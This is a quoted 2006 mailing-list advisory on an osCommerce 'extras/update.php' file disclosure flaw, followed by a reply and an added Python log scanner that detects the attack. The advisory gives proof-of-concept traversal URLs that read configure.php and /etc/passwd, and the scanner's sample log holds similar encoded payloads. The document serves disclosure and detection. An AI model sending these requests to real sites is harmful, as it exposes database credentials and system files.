> -----Original Message-----
> From: rgod@autistici.org [mailto:rgod@autistici.org]
> Sent: Friday, April 14, 2006 7:20 AM
> To: bugtraq@securityfocus.com
> Subject: osCommerce "extras/" information/source code disclosure
>
>
> ---- osCommerce <= 2.2 "extras/" information/source code disclosure ------------
>
> software site: http://www.oscommerce.com/
>
>
> if extras/ folder is placed inside the www path, you can see
> all files on target system, including php source code with
> database details, poc:
>

> http://[target]/[path]/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php
> http://[target]/[path]/extras/update.php?read_me=0&readme_file=/etc/passwd


Amazing: this was reported to oscommerce almost a year ago by andiroo
blat gmail, and they didn't do anything about it?

http://sourceforge.net/mailarchive/m..._id=12318248

http://www.oscommerce.com/community/bugs,2835

For you snorters, rules have been posted to snort-sigs and bleeding
mailing list.
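As an added illustration of the detection side mentioned above (this is example code written for this page, not the Snort rules posted to snort-sigs/bleeding and not osCommerce code): a small log scanner that flags requests to `extras/update.php` whose `readme_file` parameter carries a traversal or absolute path. The `extras/update.php` path and the `readme_file` parameter come from the original report; the Apache-style log lines, IP addresses and timestamps below are constructed for the example. It percent-decodes repeatedly so that a double-encoded `%252e%252e` does not slip past a rule that only looks for a literal `../`.

```python
import re
from urllib.parse import unquote, urlsplit, parse_qs

# Constructed sample access-log lines (not real traffic). Lines 1, 2 and 5 mirror the
# PoC from the report (relative traversal, absolute path, double-encoded traversal);
# lines 3 and 4 are benign requests that must not fire.
SAMPLE_LOG = """\
203.0.113.5 - - [14/Apr/2006:07:20:01 +0000] "GET /shop/extras/update.php?read_me=0&readme_file=../catalog/includes/configure.php HTTP/1.1" 200 1834
203.0.113.5 - - [14/Apr/2006:07:20:02 +0000] "GET /shop/extras/update.php?read_me=0&readme_file=%2Fetc%2Fpasswd HTTP/1.1" 200 1427
198.51.100.7 - - [14/Apr/2006:07:21:10 +0000] "GET /shop/extras/update.php?read_me=0&readme_file=readme.txt HTTP/1.1" 200 512
198.51.100.7 - - [14/Apr/2006:07:21:11 +0000] "GET /shop/catalog/index.php HTTP/1.1" 200 9012
203.0.113.9 - - [14/Apr/2006:07:22:00 +0000] "GET /shop/extras/update.php?read_me=0&readme_file=%252e%252e/%252e%252e/catalog/includes/configure.php HTTP/1.1" 200 1834
"""

# Apache "common" log layout: client, ident, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_fully(value, rounds=3):
    """Percent-decode until the value stops changing (bounded), so %252e%252e -> %2e%2e -> .."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(readme_file):
    """True when readme_file escapes the extras/ directory: a '..' segment or an absolute path."""
    v = decode_fully(readme_file).replace("\\", "/")  # treat backslashes like slashes
    if v.startswith("/") or re.match(r"^[A-Za-z]:", v):  # /etc/passwd, C:\...
        return True
    return ".." in v.split("/")


def scan_log(text):
    """Return (client ip, readme_file as decoded by parse_qs) for each traversal request
    to extras/update.php. Requests to other scripts and benign readme names are ignored."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/extras/update.php"):
            continue
        # parse_qs performs one round of percent-decoding; is_traversal handles the rest
        for value in parse_qs(parts.query, keep_blank_values=True).get("readme_file", []):
            if is_traversal(value):
                hits.append((m.group("ip"), value))
    return hits


if __name__ == "__main__":
    for ip, value in scan_log(SAMPLE_LOG):
        print(f"{ip} requested readme_file={value!r}")
```

The scanner only sees what the web server logged, so it catches GET query strings but not a parameter sent in a POST body, and it deliberately matches on the decoded value rather than on the literal `../` substring, which is the usual blind spot of a signature written against the raw URI.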